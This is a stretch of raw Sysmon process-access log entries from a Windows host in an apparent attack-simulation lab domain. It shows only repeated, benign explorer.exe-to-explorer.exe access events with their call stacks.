16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 